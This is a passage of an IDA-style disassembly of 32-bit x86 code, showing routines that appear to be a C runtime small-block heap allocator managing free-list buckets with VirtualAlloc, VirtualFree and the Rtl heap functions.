jz loc_4047B8
loc_404737: ; CODE XREF: sub_40459F+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_4047B8
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_40478F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40477E
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_40477E: ; CODE XREF: sub_40459F+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_4047B8
; ---------------------------------------------------------------------------
loc_40478F: ; CODE XREF: sub_40459F+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4047A5
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4047A5: ; CODE XREF: sub_40459F+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_4047B8: ; CODE XREF: sub_40459F+192�j
; sub_40459F+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_4048C3
mov eax, dword_410630
test eax, eax
jz loc_4048B5
mov ecx, dword_410628
mov esi, dword_40A14C
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_410628
mov eax, dword_410630
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_410630
mov ecx, dword_410628
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_410630
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_410630
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404846
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_410630
loc_404846: ; CODE XREF: sub_40459F+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4048B5
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_410630
push dword ptr [eax+10h]
push 0
push dword_410640
call dword_40A124 ; RtlFreeHeap
mov eax, dword_410634
mov edx, dword_410638
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_410630
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_406F40
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_410634
cmp eax, dword_410630
jbe short loc_4048AB
sub [ebp+arg_0], 14h
loc_4048AB: ; CODE XREF: sub_40459F+306�j
mov eax, dword_410638
mov dword_41062C, eax
loc_4048B5: ; CODE XREF: sub_40459F+234�j
; sub_40459F+2AB�j
mov eax, [ebp+arg_0]
mov dword_410628, edi
mov dword_410630, eax
loc_4048C3: ; CODE XREF: sub_40459F+38�j
; sub_40459F+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_40459F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048C8 proc near ; CODE XREF: sub_40349C+18�p
; sub_408845+3E�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_410634
mov edx, dword_410638
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_404908
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_404918
; ---------------------------------------------------------------------------
loc_404908: ; CODE XREF: sub_4048C8+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_404918: ; CODE XREF: sub_4048C8+3E�j
mov eax, dword_41062C
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_40493F
loc_404926: ; CODE XREF: sub_4048C8+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_40493F
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_404926
loc_40493F: ; CODE XREF: sub_4048C8+5C�j
; sub_4048C8+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4049BD
mov ebx, edx
loc_404946: ; CODE XREF: sub_4048C8+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404962
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404960
add ebx, 14h
jmp short loc_404946
; ---------------------------------------------------------------------------
loc_404960: ; CODE XREF: sub_4048C8+91�j
cmp ebx, eax
loc_404962: ; CODE XREF: sub_4048C8+83�j
jnz short loc_4049BD
loc_404964: ; CODE XREF: sub_4048C8+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_40497A
cmp dword ptr [ebx+8], 0
jnz short loc_404977
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_404964
; ---------------------------------------------------------------------------
loc_404977: ; CODE XREF: sub_4048C8+A5�j
cmp ebx, [ebp+var_4]
loc_40497A: ; CODE XREF: sub_4048C8+9F�j
jnz short loc_4049A2
mov ebx, edx
loc_40497E: ; CODE XREF: sub_4048C8+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404992
cmp dword ptr [ebx+8], 0
jnz short loc_404990
add ebx, 14h
jmp short loc_40497E
; ---------------------------------------------------------------------------
loc_404990: ; CODE XREF: sub_4048C8+C1�j
cmp ebx, eax
loc_404992: ; CODE XREF: sub_4048C8+BB�j
jnz short loc_4049A2
call sub_404BD1
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4049B6
loc_4049A2: ; CODE XREF: sub_4048C8:loc_40497A�j
; sub_4048C8:loc_404992�j
push ebx
call sub_404C82
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4049BD
loc_4049B6: ; CODE XREF: sub_4048C8+D8�j
xor eax, eax
jmp loc_404BCC
; ---------------------------------------------------------------------------
loc_4049BD: ; CODE XREF: sub_4048C8+7A�j
; sub_4048C8:loc_404962�j ...
mov dword_41062C, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4049E4
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404A1B
loc_4049E4: ; CODE XREF: sub_4048C8+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_404A18
loc_404A01: ; CODE XREF: sub_4048C8+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_404A01
loc_404A18: ; CODE XREF: sub_4048C8+137�j
mov edx, [ebp+var_4]
loc_404A1B: ; CODE XREF: sub_4048C8+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_404A44
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_404A44: ; CODE XREF: sub_4048C8+16D�j
; sub_4048C8+183�j
test ecx, ecx
jl short loc_404A4D
shl ecx, 1
inc edi
jmp short loc_404A44
; ---------------------------------------------------------------------------
loc_404A4D: ; CODE XREF: sub_4048C8+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404A6A
push 3Fh
pop esi
loc_404A6A: ; CODE XREF: sub_4048C8+19D�j
cmp esi, edi
jz loc_404B7F
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404ADB
cmp edi, 20h
jge short loc_404AAA
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_404AD8
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_404ADB
; ---------------------------------------------------------------------------
loc_404AAA: ; CODE XREF: sub_4048C8+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_404AD8
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_404ADB
; ---------------------------------------------------------------------------
loc_404AD8: ; CODE XREF: sub_4048C8+1D6�j
; sub_4048C8+203�j
mov ebx, [ebp+arg_0]
loc_404ADB: ; CODE XREF: sub_4048C8+1B0�j
; sub_4048C8+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404B8B
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404B7C
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404B4D
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404B3B
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404B3B: ; CODE XREF: sub_4048C8+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404B7C
; ---------------------------------------------------------------------------
loc_404B4D: ; CODE XREF: sub_4048C8+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404B66
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_404B66: ; CODE XREF: sub_4048C8+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404B7C: ; CODE XREF: sub_4048C8+24E�j
; sub_4048C8+283�j
mov ecx, [ebp+var_8]
loc_404B7F: ; CODE XREF: sub_4048C8+1A4�j
test ecx, ecx
jz short loc_404B8E
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404B8E
; ---------------------------------------------------------------------------
loc_404B8B: ; CODE XREF: sub_4048C8+229�j
mov ecx, [ebp+var_8]
loc_404B8E: ; CODE XREF: sub_4048C8+2B9�j
; sub_4048C8+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_404BC4
cmp ebx, dword_410630
jnz short loc_404BC4
mov ecx, [ebp+var_4]
cmp ecx, dword_410628
jnz short loc_404BC4
and dword_410630, 0
loc_404BC4: ; CODE XREF: sub_4048C8+2E0�j
; sub_4048C8+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_404BCC: ; CODE XREF: sub_4048C8+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4048C8 endp
; =============== S U B R O U T I N E =======================================
sub_404BD1 proc near ; CODE XREF: sub_4048C8+CC�p
mov eax, dword_410634
mov ecx, dword_410624
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_404C14
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_410638
push edi
push dword_410640
call dword_40A154 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_404C64
add dword_410624, 10h
mov dword_410638, eax
mov eax, dword_410634
loc_404C14: ; CODE XREF: sub_404BD1+11�j
mov ecx, dword_410638
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_410640
lea esi, [ecx+eax*4]
call dword_40A110 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_404C64
push 4
push 2000h
push 100000h
push edi
call dword_40A150 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_404C68
push dword ptr [esi+10h]
push edi
push dword_410640
call dword_40A124 ; RtlFreeHeap
loc_404C64: ; CODE XREF: sub_404BD1+30�j
; sub_404BD1+67�j
xor eax, eax
jmp short loc_404C7F
; ---------------------------------------------------------------------------
loc_404C68: ; CODE XREF: sub_404BD1+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_410634
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404C7F: ; CODE XREF: sub_404BD1+95�j
pop edi
pop esi
retn
sub_404BD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C82 proc near ; CODE XREF: sub_4048C8+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_404C94: ; CODE XREF: sub_404C82+19�j
test eax, eax
jl short loc_404C9D
shl eax, 1
inc ebx
jmp short loc_404C94
; ---------------------------------------------------------------------------
loc_404C9D: ; CODE XREF: sub_404C82+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_404CB2: ; CODE XREF: sub_404C82+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_404CB2
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_40A150 ; VirtualAlloc
test eax, eax
jnz short loc_404CE5
or eax, 0FFFFFFFFh
jmp loc_404D78
; ---------------------------------------------------------------------------
loc_404CE5: ; CODE XREF: sub_404C82+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404D2B
lea eax, [edi+10h]
loc_404CF2: ; CODE XREF: sub_404C82+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_404CF2
loc_404D2B: ; CODE XREF: sub_404C82+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_404D68
or [eax+4], edi
loc_404D68: ; CODE XREF: sub_404C82+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_404D78: ; CODE XREF: sub_404C82+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404C82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D7D proc near ; CODE XREF: sub_40915F+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_404F2B
test bl, 1
jnz loc_404F24
add ebx, ecx
cmp esi, ebx
jg loc_404F24
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_404DF4
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_404DF4: ; CODE XREF: sub_404D7D+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_404E44
cmp ecx, 20h
jnb short loc_404E20
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_404E44
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_404E44
; ---------------------------------------------------------------------------
loc_404E20: ; CODE XREF: sub_404D7D+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_404E44
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_404E44: ; CODE XREF: sub_404D7D+7D�j
; sub_404D7D+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_404F12
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_404E7E
push 3Fh
pop edi
loc_404E7E: ; CODE XREF: sub_404D7D+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_404F00
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_404ED7
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_404ECA
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_404ECA: ; CODE XREF: sub_404D7D+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_404EFC
; ---------------------------------------------------------------------------
loc_404ED7: ; CODE XREF: sub_404D7D+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_404EED
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_404EED: ; CODE XREF: sub_404D7D+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_404EFC: ; CODE XREF: sub_404D7D+158�j
shr edx, cl
or [eax], edx
loc_404F00: ; CODE XREF: sub_404D7D+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_404F15
; ---------------------------------------------------------------------------
loc_404F12: ; CODE XREF: sub_404D7D+E5�j
mov edx, [ebp+arg_4]
loc_404F15: ; CODE XREF: sub_404D7D+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_40506B
; ---------------------------------------------------------------------------
loc_404F24: ; CODE XREF: sub_404D7D+52�j
; sub_404D7D+5C�j
xor eax, eax
jmp loc_40506E
; ---------------------------------------------------------------------------
loc_404F2B: ; CODE XREF: sub_404D7D+49�j
jge loc_40506B
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_404F56
push 3Fh
pop esi
loc_404F56: ; CODE XREF: sub_404D7D+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_404FE5
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_404F6F
push 3Fh
pop esi
loc_404F6F: ; CODE XREF: sub_404D7D+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_404FBE
cmp esi, 20h
jnb short loc_404F9A
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_404FBB
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_404FBB
; ---------------------------------------------------------------------------
loc_404F9A: ; CODE XREF: sub_404D7D+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_404FBB
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_404FBB: ; CODE XREF: sub_404D7D+214�j
; sub_404D7D+21B�j ...
mov ebx, [ebp+arg_4]
loc_404FBE: ; CODE XREF: sub_404D7D+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_404FE5
push 3Fh
pop esi
loc_404FE5: ; CODE XREF: sub_404D7D+1DD�j
; sub_404D7D+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405062
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_405039
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40502C
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_40502C: ; CODE XREF: sub_404D7D+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_40505E
; ---------------------------------------------------------------------------
loc_405039: ; CODE XREF: sub_404D7D+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40504F
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_40504F: ; CODE XREF: sub_404D7D+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_40505E: ; CODE XREF: sub_404D7D+2BA�j
shr edx, cl
or [eax], edx
loc_405062: ; CODE XREF: sub_404D7D+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_40506B: ; CODE XREF: sub_404D7D+1A2�j
; sub_404D7D:loc_404F2B�j
push 1
pop eax
loc_40506E: ; CODE XREF: sub_404D7D+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_404D7D endp
; =============== S U B R O U T I N E =======================================
sub_405073 proc near ; CODE XREF: sub_4044CF+41�p
; sub_40536B:loc_40553A�p
cmp dword_40BA60, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_405087
mov esi, offset off_40BA50
jmp short loc_4050A4
; ---------------------------------------------------------------------------
loc_405087: ; CODE XREF: sub_405073+B�j
push 2020h
push 0
push dword_410640
call dword_40A110 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_4051B0
loc_4050A4: ; CODE XREF: sub_405073+12�j
mov ebp, dword_40A150
push 4
push 2000h
push offset __ImageBase
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_405199
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_40518B
mov eax, offset off_40BA50
cmp esi, eax
jnz short loc_405103
cmp off_40BA50, 0
jnz short loc_4050F3
mov off_40BA50, eax
loc_4050F3: ; CODE XREF: sub_405073+79�j
cmp off_40BA54, 0
jnz short loc_405118
mov off_40BA54, eax
jmp short loc_405118
; ---------------------------------------------------------------------------
loc_405103: ; CODE XREF: sub_405073+70�j
mov [esi], eax
mov eax, off_40BA54
mov [esi+4], eax
mov off_40BA54, esi
mov eax, [esi+4]
mov [eax], esi
loc_405118: ; CODE XREF: sub_405073+87�j
; sub_405073+8E�j
lea eax, __ImageBase[edi]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_40513A: ; CODE XREF: sub_405073+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_40513A
push ebx
push 0
push edi
call sub_403AC0
add esp, 0Ch
loc_405163: ; CODE XREF: sub_405073+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_405187
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_405163
; ---------------------------------------------------------------------------
loc_405187: ; CODE XREF: sub_405073+F7�j
mov eax, esi
jmp short loc_4051B2
; ---------------------------------------------------------------------------
loc_40518B: ; CODE XREF: sub_405073+63�j
push 8000h
push 0
push edi
call dword_40A14C ; VirtualFree
loc_405199: ; CODE XREF: sub_405073+4B�j
cmp esi, offset off_40BA50
jz short loc_4051B0
push esi
push 0
push dword_410640
call dword_40A124 ; RtlFreeHeap
loc_4051B0: ; CODE XREF: sub_405073+2B�j
; sub_405073+12C�j
xor eax, eax
loc_4051B2: ; CODE XREF: sub_405073+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_405073 endp
; =============== S U B R O U T I N E =======================================
sub_4051B7 proc near ; CODE XREF: sub_40520D+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call dword_40A14C ; VirtualFree
cmp off_40DA70, esi
jnz short loc_4051DC
mov eax, [esi+4]
mov off_40DA70, eax
loc_4051DC: ; CODE XREF: sub_4051B7+1B�j
cmp esi, offset off_40BA50
jz short loc_405204
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_410640
call dword_40A124 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_405204: ; CODE XREF: sub_4051B7+2B�j
or dword_40BA60, 0FFFFFFFFh
pop esi
retn
sub_4051B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40520D proc near ; CODE XREF: sub_405326+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_40BA54
push edi
loc_40521A: ; CODE XREF: sub_40520D+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_4052B8
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_405233: ; CODE XREF: sub_40520D+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_405274
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
